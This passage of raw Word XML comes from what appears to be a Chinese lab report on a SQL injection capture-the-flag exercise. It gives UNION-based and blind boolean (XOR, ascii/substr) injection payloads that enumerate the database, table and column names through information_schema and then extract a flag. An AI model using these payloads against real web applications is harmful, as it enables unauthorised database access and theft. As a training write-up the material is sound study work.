        <w:gridCol w:w="5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bCs/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>重复实验1步骤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32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  <w:t>1'/**/UNION/**/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  <w:t>SELECT/**/flag/**/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  <w:t>FROM/**/web1.flag/**/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  <w:t>WHERE/**/'1'='1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="528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ascii="Courier New" w:hAnsi="Courier New"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="114300" distR="114300">
                  <wp:extent cx="3213735" cy="571500"/>
                  <wp:effectExtent l="0" t="0" r="5715" b="0"/>
                  <wp:docPr id="34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73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结论</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="528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结果：flag{Y0u_@r3_5O_dAmn_90Od}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outlineLvl w:val="9"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia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15"/>
        </w:numPr>
        <w:ind w:left="425" w:leftChars="0" w:hanging="425" w:firstLineChars="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="112" w:name="_Toc6342_WPSOffice_Level2"/>
      <w:bookmarkStart w:id="113" w:name="_Toc11833_WPSOffice_Level2"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>实验3：简单的sql注入3</w:t>
      </w:r>
      <w:bookmarkEnd w:id="112"/>
      <w:bookmarkEnd w:id="113"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="9"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New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"http://ctf5.shiyanbar.com/web/index_3.php" </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="11"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>http://ctf5.shiyanbar.com/web/index_3.php</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New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outlineLvl w:val="9"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New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200"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="114" w:name="_Toc27252_WPSOffice_Level3"/>
      <w:bookmarkStart w:id="115" w:name="_Toc6096_WPSOffice_Level3"/>
      <w:bookmarkStart w:id="116" w:name="_Toc15016_WPSOffice_Level3"/>
      <w:bookmarkStart w:id="117" w:name="_Toc10729_WPSOffice_Level3"/>
      <w:bookmarkStart w:id="118" w:name="_Toc10072_WPSOffice_Level3"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>判断是否存在注入点，判断注入点的类型。</w:t>
      </w:r>
      <w:bookmarkEnd w:id="114"/>
      <w:bookmarkEnd w:id="115"/>
      <w:bookmarkEnd w:id="116"/>
      <w:bookmarkEnd w:id="117"/>
      <w:bookmarkEnd w:id="118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5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97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1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="55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ascii="Courier New" w:hAnsi="Courier New"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="114300" distR="114300">
                  <wp:extent cx="3382645" cy="426085"/>
                  <wp:effectExtent l="0" t="0" r="8255" b="12065"/>
                  <wp:docPr id="37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645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‘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1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</w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="55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ascii="Courier New" w:hAnsi="Courier New"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="114300" distR="114300">
                  <wp:extent cx="3382645" cy="426085"/>
                  <wp:effectExtent l="0" t="0" r="8255" b="12065"/>
                  <wp:docPr id="39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645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结论</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="55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lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>注入点是字符类型，且结果有值不能看到值。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200"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="119" w:name="_Toc14924_WPSOffice_Level3"/>
      <w:bookmarkStart w:id="120" w:name="_Toc31771_WPSOffice_Level3"/>
      <w:bookmarkStart w:id="121" w:name="_Toc26768_WPSOffice_Level3"/>
      <w:bookmarkStart w:id="122" w:name="_Toc9557_WPSOffice_Level3"/>
      <w:bookmarkStart w:id="123" w:name="_Toc27742_WPSOffice_Level3"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>猜测SQL查询中的字段数。</w:t>
      </w:r>
      <w:bookmarkEnd w:id="119"/>
      <w:bookmarkEnd w:id="120"/>
      <w:bookmarkEnd w:id="121"/>
      <w:bookmarkEnd w:id="122"/>
      <w:bookmarkEnd w:id="123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5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97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  <w:t>1'/**/UNION/**/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  <w:t>SELECT/**/1/**/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  <w:t>FROM/**/DUAL/**/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  <w:t>WHERE/**/'1'='1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="55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ascii="Courier New" w:hAnsi="Courier New"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="114300" distR="114300">
                  <wp:extent cx="3382645" cy="440690"/>
                  <wp:effectExtent l="0" t="0" r="8255" b="16510"/>
                  <wp:docPr id="4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645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结论</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="55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查询SQL字段数：1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200"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="124" w:name="_Toc18466_WPSOffice_Level3"/>
      <w:bookmarkStart w:id="125" w:name="_Toc182_WPSOffice_Level3"/>
      <w:bookmarkStart w:id="126" w:name="_Toc2460_WPSOffice_Level3"/>
      <w:bookmarkStart w:id="127" w:name="_Toc29098_WPSOffice_Level3"/>
      <w:bookmarkStart w:id="128" w:name="_Toc13692_WPSOffice_Level3"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>获取当前数据库。</w:t>
      </w:r>
      <w:bookmarkEnd w:id="124"/>
      <w:bookmarkEnd w:id="125"/>
      <w:bookmarkEnd w:id="126"/>
      <w:bookmarkEnd w:id="127"/>
      <w:bookmarkEnd w:id="128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5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97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  <w:t>1'^(length(database())=4)#</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="55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ascii="Courier New" w:hAnsi="Courier New"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="114300" distR="114300">
                  <wp:extent cx="3382645" cy="500380"/>
                  <wp:effectExtent l="0" t="0" r="8255" b="13970"/>
                  <wp:docPr id="43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645" cy="50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结论</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="554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当前数据库的库名长度：4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1'^( ascii( substr( database(),字符串索引,1 ) )=数字 )#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结论</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="554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字符串索引</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>[1~4],数字[1~127],用工具测试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当前数据库：web1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200"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="129" w:name="_Toc73_WPSOffice_Level3"/>
      <w:bookmarkStart w:id="130" w:name="_Toc7486_WPSOffice_Level3"/>
      <w:bookmarkStart w:id="131" w:name="_Toc19460_WPSOffice_Level3"/>
      <w:bookmarkStart w:id="132" w:name="_Toc15924_WPSOffice_Level3"/>
      <w:bookmarkStart w:id="133" w:name="_Toc28871_WPSOffice_Level3"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>获取当前数据库的目标表。</w:t>
      </w:r>
      <w:bookmarkEnd w:id="129"/>
      <w:bookmarkEnd w:id="130"/>
      <w:bookmarkEnd w:id="131"/>
      <w:bookmarkEnd w:id="132"/>
      <w:bookmarkEnd w:id="133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7"/>
        <w:gridCol w:w="5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342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1'^(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(SELECT count(table_name)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FROM information_schema.tables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WHERE table_schema=database())=2)#</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="50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ascii="Courier New" w:hAnsi="Courier New"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="114300" distR="114300">
                  <wp:extent cx="3122930" cy="560070"/>
                  <wp:effectExtent l="0" t="0" r="1270" b="11430"/>
                  <wp:docPr id="47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930" cy="56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结论</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="50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当前数据库的表数：2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default" w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>1'^(length((</w:t>
            </w:r>
          </w:p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 xml:space="preserve">SELECT </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>table_name</w:t>
            </w:r>
          </w:p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 xml:space="preserve">FROM </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>information_schema.tables</w:t>
            </w:r>
          </w:p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 xml:space="preserve">WHERE </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t xml:space="preserve">table_schema=database() limit </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>行索引</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>,1))=</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>数字</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>)#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结论</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="50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行索引</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>[0~1]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,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>数字[1,2,...],用工具测试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得到所有表名的长度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default" w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>1'^(ascii(substr(</w:t>
            </w:r>
          </w:p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 xml:space="preserve">SELECT table_name </w:t>
            </w:r>
          </w:p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 xml:space="preserve">FROM </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t xml:space="preserve">information_schema.tables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WHERE</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t xml:space="preserve"> table_schema=database() limit </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>行索引,1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>),</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>字符串索引</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>,1))=</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>数字</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>)#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结论</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="50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行索引</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>[0~1]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字符串索引</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>[1~表名长度],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数字[1~127],用工具测试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目标表：flag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200"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="134" w:name="_Toc1963_WPSOffice_Level3"/>
      <w:bookmarkStart w:id="135" w:name="_Toc24731_WPSOffice_Level3"/>
      <w:bookmarkStart w:id="136" w:name="_Toc23303_WPSOffice_Level3"/>
      <w:bookmarkStart w:id="137" w:name="_Toc3332_WPSOffice_Level3"/>
      <w:bookmarkStart w:id="138" w:name="_Toc7525_WPSOffice_Level3"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>获取目标表的目标列。</w:t>
      </w:r>
      <w:bookmarkEnd w:id="134"/>
      <w:bookmarkEnd w:id="135"/>
      <w:bookmarkEnd w:id="136"/>
      <w:bookmarkEnd w:id="137"/>
      <w:bookmarkEnd w:id="138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7"/>
        <w:gridCol w:w="5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342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1'^(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(SELECT count(column_name)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FROM information_schema.columns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Courier New" w:hAnsi="Courier New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WHERE table_name=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flag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)=2)#</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="50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vertAlign w:val="baseline"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="114300" distR="114300">
                  <wp:extent cx="3122930" cy="560070"/>
                  <wp:effectExtent l="0" t="0" r="1270" b="11430"/>
                  <wp:docPr id="48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930" cy="56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结论</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="50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当前flag表的列数：2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default" w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>1'^(length((</w:t>
            </w:r>
          </w:p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SELECT column</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>_name</w:t>
            </w:r>
          </w:p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 xml:space="preserve">FROM </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>information_schema.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>columns</w:t>
            </w:r>
          </w:p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 xml:space="preserve">WHERE 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table_name=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flag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default" w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t xml:space="preserve"> limit </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>行索引</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>,1))=</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>数字</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>)#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结论</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="50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行索引</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>[0~1]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,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>数字[1,2,...],用工具测试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得到所有列名的长度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both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default" w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>1'^(ascii(substr(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SELECT count(column_name) </w:t>
            </w:r>
          </w:p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 xml:space="preserve">FROM information_schema.columns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WHERE table_name=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flag</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>’</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t xml:space="preserve"> limit </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>行索引,1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>),</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>字符串索引</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>,1))=</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>数字</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>)#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7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结论</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5095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行索引</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>[0~1]</w:t>
            </w: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字符串索引</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>[1~列名长度],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数字[1~127],用工具测试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目标列名：flag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17"/>
        </w:numPr>
        <w:ind w:left="0" w:leftChars="0" w:firstLine="420" w:firstLineChars="200"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="139" w:name="_Toc7735_WPSOffice_Level3"/>
      <w:bookmarkStart w:id="140" w:name="_Toc24717_WPSOffice_Level3"/>
      <w:bookmarkStart w:id="141" w:name="_Toc16701_WPSOffice_Level3"/>
      <w:bookmarkStart w:id="142" w:name="_Toc9718_WPSOffice_Level3"/>
      <w:bookmarkStart w:id="143" w:name="_Toc21696_WPSOffice_Level3"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>获取数据。</w:t>
      </w:r>
      <w:bookmarkEnd w:id="139"/>
      <w:bookmarkEnd w:id="140"/>
      <w:bookmarkEnd w:id="141"/>
      <w:bookmarkEnd w:id="142"/>
      <w:bookmarkEnd w:id="143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5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1'^(ascii(substr((SELECT flag FROM flag),字符串索引,1))=数字)#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结论</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5546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vertAlign w:val="baseline"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>字符串</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>索引[1~4],数字[1~127],用工具测试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outlineLvl w:val="9"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>结果：flag{Y0u_@r3_50_dAmn_900d}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl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  <w:bookmarkStart w:id="146" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="146"/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outlineLvl w:val="9"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New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outlineLvl w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="144" w:name="_Toc5856_WPSOffice_Level1"/>
      <w:bookmarkStart w:id="145" w:name="_Toc18866_WPSOffice_Level1"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>总结</w:t>
      </w:r>
      <w:bookmarkEnd w:id="144"/>
      <w:bookmarkEnd w:id="145"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="420" w:leftChars="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="9"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="0" w:leftChars="0" w:firstLine="420" w:firstLineChars="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="9"/>
        <w:rPr>
